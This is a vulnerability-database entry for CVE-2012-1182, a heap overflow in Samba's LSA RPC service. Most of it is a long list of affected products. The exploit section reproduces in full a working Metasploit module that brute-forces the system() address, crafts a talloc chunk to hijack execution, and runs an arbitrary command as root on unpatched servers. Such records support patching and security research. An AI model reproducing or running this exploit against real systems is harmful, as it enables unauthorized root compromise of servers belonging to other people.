ID

VAR-E-201204-0283


CVE

cve_id:CVE-2012-1182

Trust: 2.4

sources: BID: 52973 // PACKETSTORM: 116953 // EXPLOIT-DB: 21850 // EDBNET: 56870

EDB ID

21850


TITLE

Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit) - Linux remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 21850

DESCRIPTION

Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit). CVE-2012-1182CVE-81303 . remote exploit for Linux platform

Trust: 0.6

sources: EXPLOIT-DB: 21850

AFFECTED PRODUCTS

vendor:sambamodel: - scope:eqversion:3.4.16/3.5.14/3.6.4

Trust: 1.0

vendor:sambamodel:sambascope:eqversion:3.5.9

Trust: 0.6

vendor:sambamodel:sambascope:eqversion:3.5

Trust: 0.6

vendor:sambamodel:ascope:eqversion:3.0.28

Trust: 0.6

vendor:sambamodel:cscope:eqversion:3.0.25

Trust: 0.6

vendor:sambamodel:bscope:eqversion:3.0.25

Trust: 0.6

vendor:sambamodel:ascope:eqversion:3.0.25

Trust: 0.6

vendor:sambamodel:setinformationpolicy auditeventsinfoscope: - version: -

Trust: 0.5

vendor:ubuntumodel:linux lts sparcscope:eqversion:8.04

Trust: 0.3

vendor:ubuntumodel:linux lts powerpcscope:eqversion:8.04

Trust: 0.3

vendor:ubuntumodel:linux lts lpiascope:eqversion:8.04

Trust: 0.3

vendor:ubuntumodel:linux lts i386scope:eqversion:8.04

Trust: 0.3

vendor:ubuntumodel:linux lts amd64scope:eqversion:8.04

Trust: 0.3

vendor:ubuntumodel:linux i386scope:eqversion:11.10

Trust: 0.3

vendor:ubuntumodel:linux amd64scope:eqversion:11.10

Trust: 0.3

vendor:ubuntumodel:linux powerpcscope:eqversion:11.04

Trust: 0.3

vendor:ubuntumodel:linux i386scope:eqversion:11.04

Trust: 0.3

vendor:ubuntumodel:linux armscope:eqversion:11.04

Trust: 0.3

vendor:ubuntumodel:linux amd64scope:eqversion:11.04

Trust: 0.3

vendor:ubuntumodel:linux sparcscope:eqversion:10.04

Trust: 0.3

vendor:ubuntumodel:linux powerpcscope:eqversion:10.04

Trust: 0.3

vendor:ubuntumodel:linux i386scope:eqversion:10.04

Trust: 0.3

vendor:ubuntumodel:linux armscope:eqversion:10.04

Trust: 0.3

vendor:ubuntumodel:linux amd64scope:eqversion:10.04

Trust: 0.3

vendor:susemodel:linux enterprise server for vmware sp2scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server for vmware sp1scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server sp2scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server sp1scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server sp4scope:eqversion:10

Trust: 0.3

vendor:susemodel:linux enterprise server sp3 ltssscope:eqversion:10

Trust: 0.3

vendor:susemodel:linux enterprise server sp2scope:eqversion:10

Trust: 0.3

vendor:susemodel:linux enterprise server gplv3 extrasscope:eqversion:10

Trust: 0.3

vendor:susemodel:linux enterprise sdk sp2scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise sdk sp1scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise sdk sp4scope:eqversion:10

Trust: 0.3

vendor:susemodel:linux enterprise desktop sp2scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise desktop sp1scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise desktop sp4scope:eqversion:10

Trust: 0.3

vendor:susemodel:opensusescope:eqversion:12.1

Trust: 0.3

vendor:susemodel:opensusescope:eqversion:11.4

Trust: 0.3

vendor:sunmodel:solaris 9 x86scope: - version: -

Trust: 0.3

vendor:sunmodel:solaris 9 sparcscope: - version: -

Trust: 0.3

vendor:sunmodel:solarisscope:eqversion:11

Trust: 0.3

vendor:sunmodel:solaris 10 x86scope: - version: -

Trust: 0.3

vendor:sunmodel:solaris 10 sparcscope: - version: -

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.6.3

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.6.2

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.6.1

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.6

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.5.8

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.5.2

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.5.1

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.14

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.13

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.12

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.11

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.10

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.8

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.7

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.6

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.5

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.2

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.1

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.16

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.15

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.14

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.13

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.12

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.11

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.10

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.9

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.8

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.7

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.6

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.5

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.4

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.3

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.1

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.15

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.14

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.13

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.12

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.11

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.10

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.7

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.6

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.5

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.4

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.3

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.2

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.1

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.37

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.36

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.35

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.34

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.33

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.32

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.31

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.30

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.29

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.28

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.27

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.26

Trust: 0.3

vendor:sambamodel:rc3scope:eqversion:3.0.25

Trust: 0.3

vendor:sambamodel:rc2scope:eqversion:3.0.25

Trust: 0.3

vendor:sambamodel:rc1scope:eqversion:3.0.25

Trust: 0.3

vendor:sambamodel:pre2scope:eqversion:3.0.25

Trust: 0.3

vendor:sambamodel:pre1scope:eqversion:3.0.25

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.25

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.24

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.23

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.22

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.21

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.20

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.19

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.18

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.17

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.16

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.15

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.14

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.13

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.12

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.11

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.10

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.9

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.8

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.7

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.6

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.5

Trust: 0.3

vendor:sambamodel:-r1scope:eqversion:3.0.4

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.4

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.3

Trust: 0.3

vendor:sambamodel:ascope:eqversion:3.0.2

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.2

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.1

Trust: 0.3

vendor:sambamodel:alphascope:eqversion:3.0

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.5.7

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.5.6

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.5.5

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.5.4

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.5.3

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.5.11

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.5.10

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.9

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.4

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.4.3

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.3.2

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.9

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.2.8

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.1

Trust: 0.3

vendor:sambamodel:rc1scope:eqversion:3.0.4

Trust: 0.3

vendor:sambamodel:3.0.27ascope: - version: -

Trust: 0.3

vendor:sambamodel:ascope:eqversion:3.0.27

Trust: 0.3

vendor:sambamodel:3.0.26ascope: - version: -

Trust: 0.3

vendor:sambamodel:ascope:eqversion:3.0.26

Trust: 0.3

vendor:sambamodel:3.0.23dscope: - version: -

Trust: 0.3

vendor:sambamodel:3.0.23cscope: - version: -

Trust: 0.3

vendor:sambamodel:3.0.23bscope: - version: -

Trust: 0.3

vendor:sambamodel:3.0.23ascope: - version: -

Trust: 0.3

vendor:sambamodel:dscope:eqversion:3.0.23

Trust: 0.3

vendor:sambamodel:cscope:eqversion:3.0.23

Trust: 0.3

vendor:sambamodel:bscope:eqversion:3.0.23

Trust: 0.3

vendor:sambamodel:ascope:eqversion:3.0.23

Trust: 0.3

vendor:sambamodel:3.0.21cscope: - version: -

Trust: 0.3

vendor:sambamodel:3.0.21bscope: - version: -

Trust: 0.3

vendor:sambamodel:3.0.21ascope: - version: -

Trust: 0.3

vendor:sambamodel:cscope:eqversion:3.0.21

Trust: 0.3

vendor:sambamodel:bscope:eqversion:3.0.21

Trust: 0.3

vendor:sambamodel:ascope:eqversion:3.0.21

Trust: 0.3

vendor:sambamodel:3.0.20bscope: - version: -

Trust: 0.3

vendor:sambamodel:3.0.20ascope: - version: -

Trust: 0.3

vendor:sambamodel:bscope:eqversion:3.0.20

Trust: 0.3

vendor:sambamodel:ascope:eqversion:3.0.20

Trust: 0.3

vendor:sambamodel:3.0.14ascope: - version: -

Trust: 0.3

vendor:sambamodel:ascope:eqversion:3.0.14

Trust: 0.3

vendor:sambamodel:sambascope:eqversion:3.0.0

Trust: 0.3

vendor:s u s emodel:suse core forscope:eqversion:9x86

Trust: 0.3

vendor:s u s emodel:corescope:eqversion:9

Trust: 0.3

vendor:researchmodel:in motion blackberry playbook tablet softwarescope:eqversion:2.0.0.7971

Trust: 0.3

vendor:researchmodel:in motion blackberry playbook tablet softwarescope:eqversion:1.0.8.6067

Trust: 0.3

vendor:researchmodel:in motion blackberry playbook tablet softwarescope:eqversion:1.0.8.4985

Trust: 0.3

vendor:researchmodel:in motion blackberry playbook tablet softwarescope:eqversion:1.0.7.3312

Trust: 0.3

vendor:researchmodel:in motion blackberry playbook tablet softwarescope:eqversion:1.0.7.2942

Trust: 0.3

vendor:researchmodel:in motion blackberry playbook tablet softwarescope:eqversion:1.0.6

Trust: 0.3

vendor:researchmodel:in motion blackberry playbook tablet softwarescope:eqversion:1.0.5.2342

Trust: 0.3

vendor:researchmodel:in motion blackberry playbook tablet softwarescope:eqversion:1.0.5.2304

Trust: 0.3

vendor:redhatmodel:enterprise linux esscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop workstation clientscope:eqversion:5

Trust: 0.3

vendor:redmodel:hat enterprise linux workstation optionalscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux workstationscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux server optional 6.0.zscope: - version: -

Trust: 0.3

vendor:redmodel:hat enterprise linux server optionalscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux server eus 6.1.zscope: - version: -

Trust: 0.3

vendor:redmodel:hat enterprise linux server eusscope:eqversion:6.0

Trust: 0.3

vendor:redmodel:hat enterprise linux serverscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux long life serverscope:eqversion:5.3

Trust: 0.3

vendor:redmodel:hat enterprise linux hpc node optionalscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux hpc nodescope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux eus 5.6.z serverscope: - version: -

Trust: 0.3

vendor:redmodel:hat enterprise linux desktop optionalscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux desktopscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux desktop clientscope:eqversion:5

Trust: 0.3

vendor:redmodel:hat enterprise linux asscope:eqversion:4

Trust: 0.3

vendor:redmodel:hat enterprise linux serverscope:eqversion:5

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:6.2

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:6

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:5

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:4

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2011

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2011

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2010.1

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2010.1

Trust: 0.3

vendor:mandrakesoftmodel:enterprise server x86 64scope:eqversion:5

Trust: 0.3

vendor:mandrakesoftmodel:enterprise serverscope:eqversion:5

Trust: 0.3

vendor:ibmmodel:storwize unifiedscope:eqversion:v70001.3.0.5

Trust: 0.3

vendor:ibmmodel:storwize unifiedscope:eqversion:v70001.3.0.0

Trust: 0.3

vendor:ibmmodel:scale out network attached storagescope:eqversion:1.3.0.4

Trust: 0.3

vendor:ibmmodel:scale out network attached storagescope:eqversion:1.1

Trust: 0.3

vendor:hpmodel:hp-ux b.11.31scope: - version: -

Trust: 0.3

vendor:hpmodel:hp-ux b.11.23scope: - version: -

Trust: 0.3

vendor:gentoomodel:linuxscope: - version: -

Trust: 0.3

vendor:debianmodel:linux sparcscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux s/390scope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux powerpcscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux mipsscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux ia-64scope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux ia-32scope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux armscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux amd64scope:eqversion:6.0

Trust: 0.3

vendor:collaxmodel:business serverscope:eqversion:5.5

Trust: 0.3

vendor:centosmodel:centosscope:eqversion:6

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:5.2.8

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:5.2.2

Trust: 0.3

vendor:avayamodel:messaging storage server sp3scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:messaging storage server sp2scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:messaging storage server sp1scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:messaging storage server sp2scope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:messaging storage server sp1scope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:5.0

Trust: 0.3

vendor:avayamodel:iqscope:eqversion:4.1

Trust: 0.3

vendor:avayamodel:iqscope:eqversion:4.2

Trust: 0.3

vendor:avayamodel:iqscope:eqversion:4.0

Trust: 0.3

vendor:avayamodel:ip office application serverscope:eqversion:8.0

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.2

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.1.3

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.1.2

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.1.1

Trust: 0.3

vendor:avayamodel:aura system manager sp2scope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:aura system manager sp1scope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:aura system manager sp1scope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:5.2

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.6

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.5

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.4

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.3

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.2

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.1

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.8

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.7

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.5

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.4

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.3

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.2

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6

Trust: 0.3

vendor:sambamodel:sambascope:neversion:3.6.4

Trust: 0.3

vendor:sambamodel:sambascope:neversion:3.5.14

Trust: 0.3

vendor:sambamodel:sambascope:neversion:3.4.16

Trust: 0.3

vendor:ibmmodel:storwize unifiedscope:neversion:v70001.3.1.0

Trust: 0.3

vendor:ibmmodel:scale out network attached storagescope:neversion:1.3.0.5

Trust: 0.3

vendor:collaxmodel:business serverscope:neversion:5.5.2

Trust: 0.3

sources: BID: 52973 // PACKETSTORM: 116953 // EXPLOIT-DB: 21850

EXPLOIT

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Brute

def initialize(info = {})
super(update_info(info,
'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow',
'Description' => %q{
This module triggers a vulnerability in the LSA RPC service of the Samba daemon
because of an error on the PIDL auto-generated code. Making a specially crafted
call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to
trigger a heap overflow and finally execute arbitrary code with root privileges.

The module uses brute force to guess the system() address and redirect flow there
in order to bypass NX. The start and stop addresses for brute forcing have been
calculated empirically. On the other hand the module provides the StartBrute and
StopBrute which allow the user to configure his own addresses.
},
'Author' =>
[
'Unknown', # Vulnerability discovery
'blasty', # Exploit
'mephos', # Debian Squeeze target
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-1182'],
['OSVDB', '81303'],
['BID', '52973'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-069/']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 811,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic bash telnet python perl'
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
['2:3.5.11~dfsg-1ubuntu2 and 2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.10',
{
'Offset' => 0x11c0,
'Bruteforce' =>
{
# The start for the final version should be 0xb20 aligned, and then step 0x1000.
'Start' => { 'Ret' => 0x00230b20 },
'Stop' => { 'Ret' => 0x22a00b20 },
'Step' => 0x1000
}
}
],
['2:3.5.8~dfsg-1ubuntu2 and 2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04',
{
'Offset' => 0x11c0,
'Bruteforce' =>
{
# The start should be 0x950 aligned, and then step 0x1000.
'Start' => { 'Ret' => 0x00230950 },
'Stop' => { 'Ret' => 0x22a00950 },
'Step' => 0x1000
}
}
],
['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 10.10',
{
'Offset' => 0x11c0,
'Bruteforce' =>
{
# The start should be 0x680 aligned, and then step 0x1000.
'Start' => { 'Ret' => 0x00230680 },
'Stop' => { 'Ret' => 0x22a00680 },
'Step' => 0x1000
}
}
],
['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',
{
'Offset' => 0x11c0,
'Bruteforce' =>
{
# The start should be 0x680 aligned, and then step 0x1000.
'Start' => { 'Ret' => 0xb6aaa1b0 },
'Stop' => { 'Ret' => 0xb6ce91b0 },
'Step' => 0x1000
}
}
]
],
'DisclosureDate' => 'Apr 10 2012',
'DefaultTarget' => 0
))

register_options([
OptInt.new("StartBrute", [ false, "Start Address For Brute Forcing" ]),
OptInt.new("StopBrute", [ false, "Stop Address For Brute Forcing" ])
], self.class)

end

def exploit
if target.bruteforce?
bf = target.bruteforce

if datastore['StartBrute'] and datastore['StartBrute'] > 0
bf.start_addresses['Ret'] = datastore['StartBrute']
end

if datastore['StopBrute'] and datastore['StopBrute'] > 0
bf.stop_addresses['Ret'] = datastore['StopBrute']
end

if bf.start_addresses['Ret'] > bf.stop_addresses['Ret']
raise ArgumentError, "StartBrute should not be larger than StopBrute"
end
end
super
end

def check
begin
connect()
smb_login()
disconnect()

version = smb_peer_lm().scan(/Samba (\d\.\d.\d*)/).flatten[0]
minor = version.scan(/\.(\d*)$/).flatten[0].to_i
print_status("Version found: #{version}")

return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16
return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14
return Exploit::CheckCode::Appears if version =~ /^3\.6/ and minor < 4

return Exploit::CheckCode::Safe

rescue ::Exception
return CheckCode::Unknown
end
end

def brute_exploit(target_addrs)

print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret'])
datastore['DCERPC::fake_bind_multi'] = false
datastore['DCERPC::max_frag_size'] = 4248

pipe = "lsarpc"

print_status("Connecting to the SMB service...")
connect()
print_status("Login to the SMB service...")
smb_login()

handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")

stub = "X" * 20

cmd = ";;;;" # padding
cmd << "#{payload.encoded}\x00" # system argument
tmp = cmd * (816/cmd.length)
tmp << "\x00"*(816-tmp.length)

stub << NDR.short(2) # level
stub << NDR.short(2) # level 2
stub << NDR.long(1) # auditing mode
stub << NDR.long(1) # ptr
stub << NDR.long(100000) # r-> count
stub << NDR.long(20) # array size
stub << NDR.long(0)
stub << NDR.long(100)
stub << rand_text_alpha(target['Offset'])
# Crafted talloc chunk
stub << 'A' * 8 # next, prev
stub << NDR.long(0) + NDR.long(0) # parent, child
stub << NDR.long(0) # refs
stub << NDR.long(target_addrs['Ret']) # destructor # will become EIP
stub << NDR.long(0) # name
stub << "AAAA" # size
stub << NDR.long(0xe8150c70) # flags
stub << "AAAABBBB"
stub << tmp # pointer to tmp+4 in $esp
stub << rand_text(32632)
stub << rand_text(62000)

print_status("Calling the vulnerable function...")

begin
call(dcerpc, 0x08, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
print_status('Server did not respond, this is expected')
rescue Rex::Proto::DCERPC::Exceptions::Fault
print_error('Server is most likely patched...')
rescue => e
if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
print_status('Server disconnected, this is expected')
end
end

handler
disconnect
end

# Perform a DCE/RPC Function Call
def call(dcerpc, function, data, do_recv = true)

frag_size = data.length
if dcerpc.options['frag_size']
frag_size = dcerpc.options['frag_size']
end
object_id = ''
if dcerpc.options['object_call']
object_id = dcerpc.handle.uuid[0]
end
if options['random_object_id']
object_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))
end

call_packets = make_request(function, data, frag_size, dcerpc.context, object_id)
call_packets.each { |packet|
write(dcerpc, packet)
}

return true if not do_recv

raw_response = ''

begin
raw_response = dcerpc.read()
rescue ::EOFError
raise Rex::Proto::DCERPC::Exceptions::NoResponse
end

if (raw_response == nil or raw_response.length == 0)
raise Rex::Proto::DCERPC::Exceptions::NoResponse
end

dcerpc.last_response = Rex::Proto::DCERPC::Response.new(raw_response)

if dcerpc.last_response.type == 3
e = Rex::Proto::DCERPC::Exceptions::Fault.new
e.fault = dcerpc.last_response.status
raise e
end

dcerpc.last_response.stub_data
end

# Used to create standard DCERPC REQUEST packet(s)
def make_request(opnum=0, data="", size=data.length, ctx=0, object_id = '')

opnum = opnum.to_i
size = size.to_i
ctx = ctx.to_i

chunks, frags = [], []
ptr = 0

# Break the request into fragments of 'size' bytes
while ptr < data.length
chunks.push( data[ ptr, size ] )
ptr += size
end

# Process requests with no stub data
if chunks.length == 0
frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) )
return frags
end

# Process requests with only one fragment
if chunks.length == 1
frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) )
return frags
end

# Create the first fragment of the request
frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) )

# Create all of the middle fragments
while chunks.length != 1
frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) )
end

# Create the last fragment of the request
frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) )

return frags
end

# Write data to the underlying socket
def write(dcerpc, data)
dcerpc.socket.write(data)
data.length
end

end

Trust: 1.0

sources: EXPLOIT-DB: 21850

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 21850

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 21850

TYPE

SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 21850

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:overflow

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:root

Trust: 0.5

